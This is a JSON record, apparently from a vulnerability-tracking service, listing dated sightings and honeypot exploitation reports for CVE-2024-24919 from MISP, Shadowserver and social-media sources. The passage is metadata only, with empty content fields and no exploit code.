{"vulnerability": "CVE-2024-24919", "sightings": [{"uuid": "686dd76a-f294-43f7-a744-107823ea9964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/dcf911ee-17b3-4902-aa15-4ecabf2e40ce", "content": "", "creation_timestamp": "2024-09-12T10:33:13.000000Z"}, {"uuid": "9e70db3c-a284-454b-949e-4a005c93809c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-05-30T18:10:03.000000Z"}, {"uuid": "29cb1d78-0a90-4b36-af7e-ec1108857b04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/b1a15b0e-d143-4e93-9a8c-45968fd29936", "content": "", "creation_timestamp": "2024-05-31T06:26:54.000000Z"}, {"uuid": "c51cb99e-3f6f-4260-8c91-80b1eed17774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3lg72ulm2bc2u", "content": "", "creation_timestamp": "2025-01-20T19:24:22.773564Z"}, {"uuid": "50a3ac24-452e-46a3-b58b-bd25b9c31a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "e7cb9845-ef74-4574-8431-af150e18d976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-31)", "content": "", "creation_timestamp": "2025-03-31T00:00:00.000000Z"}, {"uuid": "1e08323f-a326-4bcb-bf57-d96553255661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-29)", "content": "", "creation_timestamp": "2025-03-29T00:00:00.000000Z"}, {"uuid": "2575d081-6292-43e2-9db8-13195b3ce335", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-20)", "content": "", "creation_timestamp": "2025-01-20T00:00:00.000000Z"}, {"uuid": "90f10993-2cfc-4795-9818-1ef782ab93f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-23)", "content": "", "creation_timestamp": "2024-12-23T00:00:00.000000Z"}, {"uuid": "681b057a-1e26-429f-87f4-831058c28ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-30)", "content": "", "creation_timestamp": "2024-12-30T00:00:00.000000Z"}, {"uuid": "e54b2632-d1ad-47e7-b328-e6bb607d1a50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-01)", "content": "", "creation_timestamp": "2025-01-01T00:00:00.000000Z"}, {"uuid": "ffcdcd39-1b61-4f18-992f-5900e03fd7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-06)", "content": "", "creation_timestamp": "2025-01-06T00:00:00.000000Z"}, {"uuid": "48f6eb95-b388-451a-978f-755a3afcec38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/redvello.bsky.social/post/3lgpejmauvc2w", "content": "", "creation_timestamp": "2025-01-27T06:59:50.294313Z"}, {"uuid": "0ffe35b5-c2f5-4a14-a4a6-38a565e0b746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-02)", "content": "", "creation_timestamp": "2025-02-02T00:00:00.000000Z"}, {"uuid": "ec368408-cd59-423a-9dac-f21e0a231993", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-02)", "content": "", "creation_timestamp": "2025-02-02T00:00:00.000000Z"}, {"uuid": "dca1e9f0-55f5-4235-bee0-01ee64eb1ca5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-10)", "content": "", "creation_timestamp": "2025-01-10T00:00:00.000000Z"}, {"uuid": "da13c1e6-25a7-441b-94b1-2fb19f8bbf46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-24)", "content": "", "creation_timestamp": "2024-10-24T00:00:00.000000Z"}, {"uuid": "c880f1e5-95a0-46c2-97cb-3953836691a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-26)", "content": "", "creation_timestamp": "2024-10-26T00:00:00.000000Z"}, {"uuid": "fa56f20a-133a-435d-a86b-49bc71136545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-28)", "content": "", "creation_timestamp": "2024-10-28T00:00:00.000000Z"}, {"uuid": "8f688aa7-5f78-4f13-a809-28dad0322980", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-31)", "content": "", "creation_timestamp": "2024-10-31T00:00:00.000000Z"}, {"uuid": "8e360d5d-75a0-440a-a25a-25bcad8258b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-07)", "content": "", "creation_timestamp": "2024-11-07T00:00:00.000000Z"}, {"uuid": "f9f9e8f7-fd0f-47d8-be81-65296650aefc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-11)", "content": "", "creation_timestamp": "2024-11-11T00:00:00.000000Z"}, {"uuid": "666b4a5a-038d-4fff-8627-39d7d68b7855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "5fef0e1b-2c92-4bf0-96d6-21b5573e7982", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-18)", "content": "", "creation_timestamp": "2024-11-18T00:00:00.000000Z"}, {"uuid": "ffcc46f6-af8b-4bed-ba5a-ee290ae9239a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-25)", "content": "", "creation_timestamp": "2024-11-25T00:00:00.000000Z"}, {"uuid": "96c9b874-257d-441d-a61b-f044a7b95a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-02)", "content": "", "creation_timestamp": "2024-12-02T00:00:00.000000Z"}, {"uuid": "57a2cc71-2dae-4f2d-aab8-aed3c4a51510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-09)", "content": "", "creation_timestamp": "2024-12-09T00:00:00.000000Z"}, {"uuid": "19ae931f-1d8b-44a9-aef5-097b9d1acf8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-04)", "content": "", "creation_timestamp": "2024-12-04T00:00:00.000000Z"}, {"uuid": "35ecf6a2-2f41-4f02-aa21-4ea2ad12c7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "95abbd44-ef26-4287-97cc-764de5513ff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-30)", "content": "", "creation_timestamp": "2025-03-30T00:00:00.000000Z"}, {"uuid": "4ddea275-28ba-4fae-bb91-9ab523dfce6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-30)", "content": "", "creation_timestamp": "2025-03-30T00:00:00.000000Z"}, {"uuid": "d1d02a6f-d394-4039-9cbe-30798b1ee839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-16)", "content": "", "creation_timestamp": "2024-12-16T00:00:00.000000Z"}, {"uuid": "332f432d-12a1-40dc-a6aa-260d19bd7bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-20)", "content": "", "creation_timestamp": "2024-12-20T00:00:00.000000Z"}, {"uuid": "d80df6ac-2330-4fbd-8de2-3e66ee12bf67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://chaos.social/users/christopherkunz/statuses/113910639624512852", "content": "", "creation_timestamp": "2025-01-29T08:13:43.519793Z"}, {"uuid": "e85d0b5c-6d89-42f9-a3e7-a28c3df6c5f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "0f565f49-3073-4341-9521-df121fd2771f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-21)", "content": "", "creation_timestamp": "2025-01-21T00:00:00.000000Z"}, {"uuid": "6d5c533e-9974-45ed-8c14-fb6bf6b62345", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "79d7e3f4-e812-4b23-94b8-5a3bb5b37ecc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2024-11-22)", "content": "", "creation_timestamp": "2024-11-22T00:00:00.000000Z"}, {"uuid": "c7b824db-d0ad-4a8d-9fed-4a64f384adda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:01.000000Z"}, {"uuid": "833b6e58-4004-4e9f-9697-bd34ddada58e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-03)", "content": "", "creation_timestamp": "2025-03-03T00:00:00.000000Z"}, {"uuid": "4314e640-dafb-4839-b562-75e481f93093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-23)", "content": "", "creation_timestamp": "2025-03-23T00:00:00.000000Z"}, {"uuid": "54e304ac-0cac-436c-a275-c92e300f287f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "75d7e4a6-4756-49b3-aab2-494f5183bd4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-27)", "content": "", "creation_timestamp": "2025-02-27T00:00:00.000000Z"}, {"uuid": "2c04c4e1-7395-41ad-a50f-f02ba957988f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "0fe5ca71-050f-44ba-89a4-ab7b74683317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "15bc2a4d-1cbd-45d7-a02b-fa1767dddc1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "02d180ea-5932-4751-9568-ed23e77839a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "88ee6b8f-ecb8-4b92-87b6-5b334626a774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "8a311a70-f79f-4559-bb3b-05aa5e90c8e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "6f89515d-ee8c-4716-816e-deefc361e7ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-14)", "content": "", "creation_timestamp": "2025-02-14T00:00:00.000000Z"}, {"uuid": "3a863324-b8ec-4ded-b0d3-d5d8f6478264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "7285dc3e-f11b-495f-b20b-56d9bc6ea694", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "fe21edd2-9c14-4b1d-96e9-53d0f9c1352c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-26)", "content": "", "creation_timestamp": "2025-03-26T00:00:00.000000Z"}, {"uuid": "e743e383-36d0-4188-a7ab-8c8d79c64969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "2fcb574e-38b8-4efe-b3d5-ca1105d7e223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-19)", "content": "", "creation_timestamp": "2025-03-19T00:00:00.000000Z"}, {"uuid": "efbf9341-43e5-4b23-bd25-76d3366de856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "f9d69cf2-1bd4-4a0c-92ad-0ed0917da9b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "4490653e-d736-4476-9011-09fdb9fcd6cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-24)", "content": "", "creation_timestamp": "2025-03-24T00:00:00.000000Z"}, {"uuid": "cf994138-91b4-4c09-92b2-03aa7139bc21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-10)", "content": "", "creation_timestamp": "2025-03-10T00:00:00.000000Z"}, {"uuid": "6d6485c4-26f0-46ef-8f9a-f52744694973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-13)", "content": "", "creation_timestamp": "2025-03-13T00:00:00.000000Z"}, {"uuid": "a2ffc01e-e5d7-4200-9d13-7ba5dc45af37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-21)", "content": "", "creation_timestamp": "2025-03-21T00:00:00.000000Z"}, {"uuid": "77c197bd-bace-470e-b572-8a5cd663e2bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "0e730932-5de8-4cd1-b60c-9c40596731e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "3c0f1131-b39b-4b2f-a0c2-a7dfb2b58731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "187c657d-ba94-417c-b137-520fccf90889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "466a58d5-55f5-472a-9405-61476b938637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-11)", "content": "", "creation_timestamp": "2025-03-11T00:00:00.000000Z"}, {"uuid": "ed55e72d-99e7-44bf-90d7-e84c8df078ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "bad3a929-3ca2-4d93-9d5c-899e6bc1f591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "ad40e458-85f7-40fc-80de-b4bfad1af8b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3liluswuyy32u", "content": "", "creation_timestamp": "2025-02-20T08:31:04.486765Z"}, {"uuid": "f03965fc-dd27-4d11-8673-a6fbeaa2ddd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lilwomkhtk2a", "content": "", "creation_timestamp": "2025-02-20T09:04:27.069623Z"}, {"uuid": "fbe2cb86-54ea-41f5-b062-6f25729a2e8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-19)", "content": "", "creation_timestamp": "2025-02-19T00:00:00.000000Z"}, {"uuid": "203af097-e198-4a19-ba49-6d15eda7fb7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3limasszzkr2k", "content": "", "creation_timestamp": "2025-02-20T12:05:45.869822Z"}, {"uuid": "2ee121d6-7d7d-465c-b811-aecbf83803d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-21)", "content": "", "creation_timestamp": "2025-02-21T00:00:00.000000Z"}, {"uuid": "8c58e858-54e3-4104-b934-1944fd9169c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-28)", "content": "", 